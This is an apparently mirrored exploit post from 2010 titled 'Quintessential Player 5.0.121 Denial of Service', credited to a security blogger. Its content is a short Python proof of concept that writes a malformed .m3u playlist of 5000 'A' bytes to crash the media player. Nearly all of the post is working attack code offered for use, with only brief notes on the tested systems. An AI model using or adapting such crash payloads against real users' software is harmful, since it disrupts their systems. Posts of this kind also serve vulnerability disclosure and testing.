Quintessential Player 5.0.121 Denial of Service
|
来源:http://aslitsecurity.blogspot.com 作者:abhishek 发布时间:2010-08-10
|
|
#vulnerble application link http://www.quinnware.com/downloads.php #tested on XP SP2/3 #author abhishek lyall - abhilyall[at]gmail[dot]com #web::: http://aslitsecurity.com Blog::: http://aslitsecurity.blogspot.com #!/usr/bin/python filename = "Quintessential.m3u" junk = "\x41" * 5000 textfile = open(filename , 'w') textfile.write(junk) textfile.close()
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|